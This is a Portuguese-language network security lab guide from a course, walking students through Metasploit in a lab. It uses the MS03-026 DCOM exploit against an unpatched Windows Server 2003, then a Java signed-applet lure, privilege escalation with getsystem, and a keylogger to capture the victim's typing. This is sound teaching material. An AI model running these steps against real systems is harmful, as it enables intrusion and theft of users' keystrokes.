Unidade Curricular Segurança em Redes Prof. Eduardo Maroñas Monks Aluno Gérson Porciúncula Siqueira Roteiro de Laboratório Ferramentas de Segurança - Metasploit Objetivo: Analisar e demonstrar a aplicação da ferramenta Metasploit. Ferramentas Vmware Player, Putty, Backtrack, Windows Server 2003, CentOS e Metasploit. Introdução Neste roteiro de laboratório, será feita uma introdução a ferramenta de segurança em redes Metasploit, onde tem por objeito a criação de exploits. Metasploit Framework é uma avançada plataforma Open Source, concebida especificamente com o objetivo de reforçar e acelerar o desenvolvimento, ensaio e utilização de exploits. Escrito em Perl, possui componentes em C e Assembler, pode-se utilizar em Linux, BSD Windows, MacOS. Escrito na maioria das vezes em "Perl" (seu único defeito, de acordo com o parecer do número cada vez maior de amantes de "Python"...) e com vários componentes desenvolvidos em "C " e "Assembler", sua portabilidade está assegurada, o que contribui em larga medida para a sua aceitação maciça, porque qualquer que seja a sua escolha de plataforma de uso (Like-Unix, BSD, Mac X, Windows etc), pode instalá-lo e desfrutar todos os seus poderes em poucos minutos e sem grandes dificuldades. Tem a sua licença baseada tanto no GPL v2 e "Perl Artistic License", permitindo a sua utilização em projetos Open Source assim como em projetos comerciais, tendo como seu principal objetivo a criação de exploits e a montagem de um cenário de pesquisa, desenvolvimento e exploração de vulnerabilidades. Pois fornece as ferramentas que se fazem necessárias para descoberta da vulnerabilidade, análise, e desenvolvimento do exploit. Tarefas: 1) Habilitar a máquina virtual do Backtrack, Windows Server 2003 e Windows 7(Solicitar vms Windows ao colega). 1. Utilizar a máquina virtual do Backtrack 5, disponível em ftp://192.168.200.3/bt5r1- GNOME-VM-32.7z com rede em modo bridge. 2. Ao iniciar a máquina virtual acessar com o usuário root e senha toor. 2.1 Para iniciar o modo gráfico executar o comando "startx".
2.2 Habilitar o serviço de ssh no Backtrack com o comando sshdgenerate no terminal e após iniciar o serviço /etc/init.d/ssh start. 3. Caso prefira pode utilizar a máquina virtual ftp://192.168.200.3/tiaomacale3.zip 3.1 Fazer download do arquivo de instalação em http://www.metasploit.com/framework/download/ 3.2 Executar os comandos: # chmod +x metasploit-latest-linux-installer.run #./metasploit-latest-linux-installer.run 4. Iniciar a máquina virtual windows Server 2003, com a senha "senac2010" 2) Utilização do software Metasploit no Backtrack. 2.1 Acesse a ferramenta pelo terminal no caminho: /pentest/exploits/framework/ e execute./msfconsole para iniciar a ferramenta. 3) Vulnerabilidade Server 2003 (Sem service pack) 3.1 Caso não saiba o IP pode procurar pela porta 135 com o comando nmap -ss -p 135 XXX.XXX.XXX.*, caso saiba o IP do alvo execute nmap -SS -p 135 192.168.201.74. Observe a saída do comando e procure pela porta e seu estado, conforme a Figura 1. Figura 1: Varredura de portas. 3.2 Como a consulta retornou que a porta está ativa e no estado open, o próximo passo é utilizar o exploit windows/dcerpc/ms03_026_dcom. Portanto digite o seguinte comandos msf> use windows/dcerpc/ms03_026_dcom para utilizar o exploit e o Comando para listar portas e sistemas suscetíveis a este tipo de ataque msf exploit(ms03_026_dcom) > show options. 3.3 Com o IP do alvo descoberto basta setar ele e exploitar, com o comando msf exploit(ms03_026_dcom) > set rhost XXX.XXX.XXX.XXX e msf exploit(ms03_026_dcom) > exploit. Caso a máquina esteja em um estado vulnerável a sessão será aberta com o alvo igual à Figura 2.
Figura 2: Acesso a console da vítima. 3.4 Com o acesso ao console pode-se obter os comandos disponíveis com?, por exemplo ao digitar o comando sysinfo obtém se informações sobre o sistema atacado, Figura3. Figura 3: Execução de comando na máquina remota. 4) Engenharia social 4.1 Neste exercício o usuário terá que executar um aplicativo na sua máquina(windows 7), a partir desse ponto o atacante tem controle a máquina da vítima. Obs. Necessário o uso do Java. http://192.168.200.3/software/jre-6u13-windows-i 586-p-s.exe 4.2 Acesse a console do Metasploit como no passo 2.2.1, procure pelo java applet com o comando search java_signed_applet. Encontrado o exploit execute use multi/browser/java_signed_applet e liste as opções disponíveis com o comando msf exploit(java_signed_applet)> show options. 4.3 O próximo passo é criar uma aplicação com o comando msf exploit(java_signed_applet) > set APPLETNAME Mel, modificar a porta de escuta do servidor com o comando msf exploit(java_signed_applet)> set SRVPORT 80 e definir a URL com o comando msf exploit(java_signed_applet)> set URIPATH /mel, anunciar o servidor msf exploit(java_signed_applet) > set lhost XXX.XXX.XXX.XXX e para deixar o servidor em estado de listening execute o comando msf exploit(java_signed_applet) >
exploit SERVIÇO NACIONAL DE APRENDIZAGEM COMERCIAL 4.4 Agora o usuário deverá digitar na máquina alvo o acesso ao site XXX.XXX.XXX/mel surgirá uma tela solicitando que o usuário execute o java. 4.5 Execute no terminal do Metasploit o comando sessions -l para listar as sessões ativas e o comando sessions -i 1 para assumir a sessão 1. Obs. Dependendo do usuário que acessou o site com o exploit você não terá permissões na máquina alvo, deverá ser feito um processo chamado uma escalada de processos, que consiste em executar o comando getsystem para que assuma o uid do usuário administrador da máquina, verifique com getuid o usuário que está acessando, Figura 4. Figura 4: Usuário atual. 4.6 Agora que tem poderes :) assuma o controle do explorer.exe com o comando migrate pid, onde pid é o número do processo do explorer.exe. Após isso digite o comando keyscan_start para começar a utilizar o keylogger, por fim execute keyscan_dump e será mostrado o que o usuário digitou na máquina invadida conforma a Figura 5. Figura 5: Exemplo de uso de keylogger.
Conclusões SERVIÇO NACIONAL DE APRENDIZAGEM COMERCIAL Nota-se que há grandes vulnerabilidades espalhadas e com poucos comandos podem ser facilmente utilizadas para ações maliciosas. Observou-se que para os testes acima, atualizações de segurança e conscientização do usuário podem ajudar a se prevenir contra esse tipo de ataque. Referencias: Material no servidor Mussum Top Network Security Tools http://sectools.org/ Metasploit http://www.metasploit.com Distribuic ao BackTrack 3 (LiveCD) disponivel em ftp://192.168.200.3/bt3-final.iso Distribuic ao BackTrack 5 (VM) disponivel em ftp://192.168.200.3/bt5r1-gnome-vm- 32.7z